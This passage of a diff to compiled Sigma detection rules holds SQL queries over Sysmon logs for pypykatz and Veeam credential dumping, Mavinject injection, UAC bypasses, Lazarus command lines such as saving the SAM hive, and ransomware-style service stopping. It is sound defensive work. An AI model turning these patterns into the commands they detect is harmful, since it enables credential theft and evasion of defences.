"jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": 
"test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.005" + "attack.t1003.002" ], "falsepositives": [ - "Legitimate administrative tasks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmdkey_recon.yml" + "filename": "proc_creation_win_hktl_pypykatz.yml" }, { - "title": "Potential Persistence Via Netsh Helper DLL", - "id": "56321594-9087-49d9-bf10-524fe8479452", - "status": "test", - "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. 
This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1555.004" + ], + "falsepositives": [ + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentImage LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + 
"filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE 
'%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND Image LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": 
"proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": "811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN 
('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], - "filename": "proc_creation_win_pua_process_hacker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentImage LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine 
LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the 
pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", + "status": "experimental", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE 
'%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' 
ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "status": "experimental", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
